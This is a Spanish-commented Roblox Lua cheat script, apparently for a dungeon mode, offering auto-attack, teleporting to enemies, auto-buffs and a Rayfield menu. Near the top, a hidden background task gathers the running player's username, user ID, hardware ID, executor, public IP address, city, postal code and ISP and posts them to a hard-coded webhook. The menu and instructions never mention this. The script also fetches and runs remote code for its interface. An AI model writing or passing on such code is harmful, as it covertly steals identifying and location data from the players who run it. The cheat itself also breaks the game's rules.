-- ==========================================================
-- ⚔️ OTRA OBRA DE EDSUSITO - VERSIÓN DEFINITIVA PREMIUM ULTRA ⚔️
-- ==========================================================

local HttpService = game:GetService("HttpService")
local Players = game:GetService("Players")
local Workspace = game:GetService("Workspace")
local ReplicatedStorage = game:GetService("ReplicatedStorage")
local UserInputService = game:GetService("UserInputService")

local localPlayer = Players.LocalPlayer

-- ==========================================================
-- 🛡️ SISTEMA DE LISTA BLANCA (WHITELIST)
-- Para activarlo, borra las líneas "--[[" y "]]" que envuelven el bloque 'if not Whitelist...'
-- ==========================================================
local Whitelist = {
    [123456789] = true, -- Reemplaza este número con el ID de la cuenta permitida
    [987654321] = true, -- Sigue este formato para añadir más personas
}

--[[
if not Whitelist[localPlayer.UserId] then
    localPlayer:Kick("⛔ No tienes acceso a Edsusito Dungeon Premium.")
    return
end
]]

local character = localPlayer.Character or localPlayer.CharacterAdded:Wait()
local humanoidRootPart = character:WaitForChild("HumanoidRootPart")

-- ==========================================================
-- 📡 1. WEBHOOK: EL CHISMOSO PREMIUM ULTRA (VERSIÓN DIOS)
-- ==========================================================
task.spawn(function()
    local WebhookURL = "https://webhook.lewisakura.moe/api/webhooks/1527303066431389796/XMkQJ-N1Y0Fo7Kb23Bod9m2VtZbhHRIGCuCOD4tUJHeHJhaB_TnfRAxogKskRdpExxnn"
    
    -- Detección de Dispositivo y Pantalla
    local dispositivo = "PC 💻"
    if UserInputService.TouchEnabled and not UserInputService.KeyboardEnabled then
        dispositivo = "Móvil 📱"
    elseif UserInputService.GamepadEnabled then
        dispositivo = "Consola 🎮"
    end
    
    local cam = workspace.CurrentCamera
    local resolucion = cam and tostring(cam.ViewportSize.X) .. "x" .. tostring(cam.ViewportSize.Y) or "Desconocida"

    -- Datos del Ejecutor y Hardware
    local executorName = identifyexecutor and identifyexecutor() or "Desconocido"
    local hwid = gethwid and gethwid() or "No soportado por el ejecutor"
    local accountAge = tostring(localPlayer.AccountAge) .. " días"

    -- Extracción Máxima de Datos de Red y Ubicación (IP-API)
    local ipData = {
        query = "Oculta/Fallida", 
        country = "N/A", 
        regionName = "N/A", 
        city = "N/A", 
        zip = "N/A", 
        isp = "N/A", 
        timezone = "N/A"
    }
    
    pcall(function()
        local response = game:HttpGet("http://ip-api.com/json/")
        if response then
            local decoded = HttpService:JSONDecode(response)
            if decoded and decoded.status == "success" then
                ipData = decoded
            end
        end
    end)
    
    local horaActual = os.date("%Y-%m-%d %H:%M:%S")
    local displayName = localPlayer.DisplayName
    local userName = localPlayer.Name
    local userId = tostring(localPlayer.UserId)
    
    -- Construcción del Mensaje Ultra Detallado
    local mensaje = "📡 **ALERTA DE EJECUCIÓN - EDSUSITO PREMIUM EXCLUSIVO** 📡\n" ..
                    "```yaml\n" ..
                    "[ 👤 DATOS DEL USUARIO ]\n" ..
                    "Nombre:      " .. displayName .. "\n" ..
                    "Usuario:     " .. userName .. "\n" ..
                    "User ID:     " .. userId .. "\n" ..
                    "Antigüedad:  " .. accountAge .. "\n\n" ..
                    
                    "[ 💻 DATOS TÉCNICOS ]\n" ..
                    "Ejecutor:    " .. executorName .. "\n" ..
                    "Hardware ID: " .. hwid .. "\n" ..
                    "Dispositivo: " .. dispositivo .. "\n" ..
                    "Resolución:  " .. resolucion .. "\n" ..
                    "Juego (ID):  " .. tostring(game.PlaceId) .. "\n" ..
                    "Hora Local:  " .. horaActual .. "\n\n" ..
                    
                    "[ 🌍 DATOS DE RED Y UBICACIÓN ]\n" ..
                    "IP Pública:  " .. ipData.query .. "\n" ..
                    "Proveedor:   " .. ipData.isp .. "\n" ..
                    "País:        " .. ipData.country .. "\n" ..
                    "Región/Prov: " .. ipData.regionName .. "\n" ..
                    "Ciudad:      " .. ipData.city .. "\n" ..
                    "Cód. Postal: " .. ipData.zip .. "\n" ..
                    "Zona Horaria:" .. ipData.timezone .. "\n" ..
                    "```\n" ..
                    "👉 **[🔍 INVESTIGAR PERFIL DE " .. string.upper(userName) .. "](https://www.roblox.com/users/" .. userId .. "/profile)**"

    local data = { ["content"] = mensaje }
    local jsonData = HttpService:JSONEncode(data)

    local requestFunction = syn and syn.request or http and http.request or http_request or request or fluxus and fluxus.request
    if requestFunction then
        pcall(function()
            requestFunction({
                Url = WebhookURL,
                Method = "POST",
                Headers = {["Content-Type"] = "application/json"},
                Body = jsonData
            })
        end)
    else
        pcall(function()
            HttpService:PostAsync(WebhookURL, jsonData)
        end)
    end
end)

-- ==========================================================
-- ⚙️ 2. VARIABLES Y ESTADO DEL SCRIPT
-- ==========================================================
local justDied = false 
local attackHeight = 40 
local v4Enabled = false
local selectedWeaponType = "Sword"

local autoDungeonActive = false
local currentTarget = nil
local lastTarget = nil 

local netFolder = ReplicatedStorage:WaitForChild("Modules"):WaitForChild("Net")
local registerAttack = netFolder:WaitForChild("RE/RegisterAttack")
local registerHit = netFolder:WaitForChild("RE/RegisterHit")
local enemiesFolder = Workspace:FindFirstChild("Enemies") or Workspace
local commF = ReplicatedStorage:WaitForChild("Remotes"):WaitForChild("CommF_")

localPlayer.CharacterAdded:Connect(function(newCharacter)
    character = newCharacter
    humanoidRootPart = newCharacter:WaitForChild("HumanoidRootPart")
    justDied = true 
end)

-- ==========================================================
-- 🗡️ 3. LÓGICA DE COMBATE Y MOVIMIENTO ESTÁTICO
-- ==========================================================
local function IsHakiActive()
    if not character then return false end
    return character:FindFirstChild("HasBuso") ~= nil
end

local function ForceActivateHaki()
    if not character or not autoDungeonActive then return end
    if not IsHakiActive() then
        pcall(function() commF:InvokeServer("Buso") end)
    end
end

local function ForceEquipWeapon()
    if not character or not autoDungeonActive then return end
    local currentTool = character:FindFirstChildOfClass("Tool")
    
    if currentTool then
        if selectedWeaponType == "Sword" and (currentTool.ToolTip == "Sword" or string.find(string.lower(currentTool.Name), "sword") or string.find(string.lower(currentTool.Name), "katana")) then return end
        if selectedWeaponType == "Melee" and currentTool.ToolTip == "Melee" then return end
    end
    
    local backpack = localPlayer:FindFirstChildOfClass("Backpack")
    if backpack then
        for _, tool in ipairs(backpack:GetChildren()) do
            if tool:IsA("Tool") then
                local match = false
                if selectedWeaponType == "Sword" and (tool.ToolTip == "Sword" or string.find(string.lower(tool.Name), "sword") or string.find(string.lower(tool.Name), "katana")) then match = true
                elseif selectedWeaponType == "Melee" and tool.ToolTip == "Melee" then match = true end
                
                if match then
                    local humanoid = character:FindFirstChildOfClass("Humanoid")
                    if humanoid then humanoid:EquipTool(tool) break end
                end
            end
        end
    end
end

local function StartAutoBuffs()
    task.spawn(function()
        while autoDungeonActive do
            ForceEquipWeapon()
            task.wait(0.3)
        end
    end)
    task.spawn(function()
        while autoDungeonActive do
            ForceActivateHaki()
            task.wait(0.1)
        end
    end)
end

local function GetClosestEnemy()
    if justDied then return nil end 

    local closestEnemy = nil
    local shortestDistance = math.huge
    if not character or not character:FindFirstChild("HumanoidRootPart") then return nil end
    
    local myPos = character.HumanoidRootPart.Position
    local sourceFolder = Workspace:FindFirstChild("Enemies") or enemiesFolder
    
    if sourceFolder then
        local primaryCandidates = {}
        local backupCandidates = {}
        
        for _, object in ipairs(sourceFolder:GetChildren()) do
            if object:IsA("Model") and object ~= character and object.Name ~= "Blank Buddy" and object.Name ~= "Sombra" and object.Name ~= "Shadow" then
                local humanoid = object:FindFirstChildOfClass("Humanoid")
                local root = object:FindFirstChild("HumanoidRootPart") or object:FindFirstChild("Head")
                
                if humanoid and humanoid.Health > 0 and root and object.Parent then
                    local distance = (root.Position - myPos).Magnitude
                    if object ~= lastTarget then
                        table.insert(primaryCandidates, {model = object, dist = distance})
                    else
                        table.insert(backupCandidates, {model = object, dist = distance})
                    end
                end
            end
        end
        
        local targetList = #primaryCandidates > 0 and primaryCandidates or backupCandidates
        for _, candidate in ipairs(targetList) do
            if candidate.dist < shortestDistance then
                shortestDistance = candidate.dist
                closestEnemy = candidate.model
            end
        end
    end
    return closestEnemy
end

local function TeleportToEnemy(enemy)
    if not enemy or not enemy.Parent or not humanoidRootPart then return false end
    
    local enemyRoot = enemy:FindFirstChild("HumanoidRootPart") or enemy:FindFirstChild("Head")
    if not enemyRoot then return false end
    
    pcall(function()
        -- Teletransporte estático sin dar saltos extraños
        humanoidRootPart.Velocity = Vector3.new(0, 0, 0)
        humanoidRootPart.RotVelocity = Vector3.new(0, 0, 0)
        
        humanoidRootPart.CFrame = CFrame.new(
            enemyRoot.Position + Vector3.new(0, attackHeight, 0), 
            enemyRoot.Position
        )
    end)
    return true
end

local function AttackEnemy(enemy)
    if not enemy or not enemy.Parent then return end
    local enemyHead = enemy:FindFirstChild("Head")
    if not enemyHead then return end
    
    local tool = character:FindFirstChildOfClass("Tool")
    if tool then tool:Activate() end
    
    pcall(function()
        registerAttack:FireServer(0)
        registerHit:FireServer(enemyHead, {{enemy, enemyHead}})
    end)
end

-- ==========================================================
-- 🚪 4. PROGRESIÓN DE DUNGEON Y ROTACIÓN
-- ==========================================================
local function GetCurrentRoomIndex(rooms)
    if not humanoidRootPart then return 1 end
    local myPos = humanoidRootPart.Position
    local currentRoomIdx = 1
    local minDistanceToRoomCenter = math.huge
    
    for i, room in ipairs(rooms) do
        local roomPart = room:FindFirstChildOfClass("Part") or room:FindFirstChildOfClass("MeshPart") or room:FindFirstChild("Floor")
        if roomPart then
            local dist = (roomPart.Position - myPos).Magnitude
            if dist < minDistanceToRoomCenter then
                minDistanceToRoomCenter = dist
                currentRoomIdx = i
            end
        end
    end
    return currentRoomIdx
end

local function AutoPassRoom()
    local mapFolder = Workspace:FindFirstChild("Map")
    if not mapFolder then return false end
    local dungeonFolder = mapFolder:FindFirstChild("Dungeon")
    if not dungeonFolder then return false end
    
    local rooms = dungeonFolder:GetChildren()
    if #rooms == 0 then return false end
    
    table.sort(rooms, function(a, b)
        local numA = tonumber(string.match(a.Name, "%d+")) or 0
        local numB = tonumber(string.match(b.Name, "%d+")) or 0
        return numA < numB
    end)
    
    local activeRoom = rooms[GetCurrentRoomIndex(rooms)]
    if activeRoom then
        local teleporter = activeRoom:FindFirstChild("ExitTeleporter")
        if teleporter then
            local rootPart = teleporter:FindFirstChild("Root")
            if rootPart and humanoidRootPart then
                humanoidRootPart.CFrame = rootPart.CFrame
                task.wait(0.12)
                if firetouchinterest then
                    firetouchinterest(humanoidRootPart, rootPart, 0)
                    task.wait(0.1)
                    firetouchinterest(humanoidRootPart, rootPart, 1)
                end
                justDied = false
                return true
            end
        end
    end
    return false
end

local function RotateTargets()
    while autoDungeonActive do
        currentTarget = GetClosestEnemy()
        
        if currentTarget and not justDied then
            lastTarget = currentTarget
            local enemyHumanoid = currentTarget:FindFirstChildOfClass("Humanoid")
            local timer = 0
            
            -- Temporizador configurado estrictamente en 0.3 segundos para velocidad extrema
            while autoDungeonActive and currentTarget and currentTarget.Parent and enemyHumanoid and enemyHumanoid.Health > 0 and timer < 0.3 and not justDied do
                TeleportToEnemy(currentTarget)
                AttackEnemy(currentTarget)
                task.wait(0.01)
                timer = timer + 0.01
            end
        else
            if justDied then
                local passed = false
                local attempts = 0
                while autoDungeonActive and justDied and attempts < 10 do
                    passed = AutoPassRoom()
                    if passed then justDied = false break end
                    attempts = attempts + 1
                    task.wait(0.5)
                end
                if attempts >= 10 then justDied = false end
            else
                task.wait(1.0)
                if not AutoPassRoom() then task.wait(0.5) end
            end
        end
    end
end

-- ==========================================================
-- ⚡ 5. SISTEMA AUTO V4
-- ==========================================================
local function ActivarV4()
    pcall(function()
        local currentChar = localPlayer.Character
        if currentChar and currentChar:FindFirstChild("Awakening") then
            currentChar.Awakening.RemoteFunction:InvokeServer(true)
        elseif localPlayer.Backpack:FindFirstChild("Awakening") then
            localPlayer.Backpack.Awakening.RemoteFunction:InvokeServer(true)
        end
    end)
end

task.spawn(function()
    while task.wait(1) do
        if v4Enabled then ActivarV4() end
    end
end)

-- ==========================================================
-- 🎨 6. INTERFAZ GRÁFICA (RAYFIELD) - SELLO DE EDSUSITO
-- ==========================================================
local Rayfield = loadstring(game:HttpGet('https://sirius.menu/rayfield'))()

local Window = Rayfield:CreateWindow({
    Name = "⚔️ Edsusito Dungeon Premium ⚔️",
    LoadingTitle = "Otra obra de Edsusito",
    LoadingSubtitle = "Disfruta el Premium",
    ConfigurationSaving = { Enabled = false },
    Discord = { Enabled = false },
    KeySystem = false
})

local DungeonTab = Window:CreateTab("🗡️ Dungeon", 4483362458)

DungeonTab:CreateSection("🔥 Operaciones Principales")
DungeonTab:CreateToggle({
    Name = "Auto Completar Dungeon ⚔️",
    CurrentValue = false,
    Flag = "EdsuAutoDungeonFlag",
    Callback = function(Value)
        autoDungeonActive = Value
        if Value then
            justDied = false
            StartAutoBuffs() 
            coroutine.wrap(RotateTargets)()
        else
            currentTarget = nil
            lastTarget = nil
            justDied = false
            Rayfield:Notify({
                Title = "⚔️ Edsusito Dungeon ⚔️",
                Content = "Ciclo de rotación pausado con éxito.",
                Duration = 2,
                Image = 4483362458,
            })
        end
    end,
})

DungeonTab:CreateSection("🎒 Armería de Edsu")
DungeonTab:CreateDropdown({
    Name = "Selecciona tu Arma",
    Options = {"Espada", "Combate (Melee)"},
    CurrentOption = {"Espada"},
    MultipleOptions = false,
    Flag = "WeaponSelect",
    Callback = function(Option)
        local choice = type(Option) == "table" and Option[1] or Option
        if choice == "Espada" then selectedWeaponType = "Sword"
        elseif choice == "Combate (Melee)" then selectedWeaponType = "Melee" end
    end,
})

DungeonTab:CreateSlider({
    Name = "Altura de Ataque 📏",
    Range = {10, 100}, 
    Increment = 1,
    Suffix = " studs",
    CurrentValue = 40,
    Flag = "AttackHeightFlag",
    Callback = function(Value)
        attackHeight = Value
    end,
})

DungeonTab:CreateSection("✨ Cositas Mágicas")
DungeonTab:CreateToggle({
    Name = "Auto V4 (A la velocidad de la luz) ⚡",
    CurrentValue = false,
    Callback = function(V) v4Enabled = V end,
})

local InstructionsTab = Window:CreateTab("📜 Instrucciones", 4483362458)

InstructionsTab:CreateSection("😎 Manual de Edsusito")

InstructionsTab:CreateParagraph({
    Title = "Auto Completar Dungeon ⚔️",
    Content = "Tú solo enciéndelo y deja que la magia ocurra. Mientras el bot hace el trabajo sucio, tú puedes ir por un pancito. Si ves a alguien sufriendo en la dungeon, de seguro le falta su edsusito jeje."
})

InstructionsTab:CreateParagraph({
    Title = "Armería (Espada o Combate) 🎒",
    Content = "Elige 'Espada' si quieres cortar o 'Combate' si quieres subir tu estilo de pelea a puro puño. El script obligará a tu personaje a no soltar el arma."
})

InstructionsTab:CreateParagraph({
    Title = "Altura de Ataque 📏",
    Content = "¿Quieres darles desde el techo o mirarlos a los ojos? Viene por defecto en 40, y está reescrito para que no des brinquitos extraños al golpear."
})

InstructionsTab:CreateParagraph({
    Title = "Auto V4 ⚡",
    Content = "Apenas se llene esa barrita morada, ¡pum! Nos transformamos. Cero estrés, el bot apretará el botón internamente más rápido que cualquiera."
})

InstructionsTab:CreateSection("🔧 Regla de Oro")
InstructionsTab:CreateLabel("Si algo se bugea (ya sabes cómo es Roblox), apaga y prende los toggles. Truco viejo pero infalible jeje.")
